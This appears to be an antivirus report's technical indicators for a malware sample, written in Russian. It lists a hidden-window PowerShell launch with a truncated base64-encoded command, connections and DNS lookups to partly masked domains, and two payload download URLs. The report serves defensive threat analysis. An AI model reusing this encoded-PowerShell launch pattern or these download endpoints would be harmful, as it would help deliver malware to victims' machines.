Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABIAGUAcgByAHEAbAB4AHoAYgA9ACcAUgBnAGcAZwB5AHcAYwB5AGsAJwA7ACQASgBrAGIAbABuAGsAYQB2AHMAIAA9ACAAJwA0AD...
- 'sl###lief.org':443
- 'st####-ogham.com':80
- 'st####-ogham.com':443
- 'me####paradies.com':80
- 'me##eko.com':443
- http://www.st####-ogham.com/kftt/HLmGG0thkP/
- http://me####paradies.com/wp-content/sak3krg/
- 'sl###lief.org':443
- 'st####-ogham.com':443
- 'me##eko.com':443
- DNS ASK sl###lief.org
- DNS ASK tu####spuestas.com
- DNS ASK st####-ogham.com
- DNS ASK me####paradies.com
- DNS ASK me##eko.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABIAGUAcgByAHEAbAB4AHoAYgA9ACcAUgBnAGcAZwB5AHcAYwB5AGsAJwA7ACQASgBrAGIAbABuAGsAYQB2AHMAIAA9ACAAJwA0AD...' (со скрытым окном)